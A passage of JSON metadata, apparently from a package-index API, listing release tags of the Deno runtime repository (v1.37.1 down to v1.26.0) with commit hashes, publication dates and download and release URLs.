ag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg: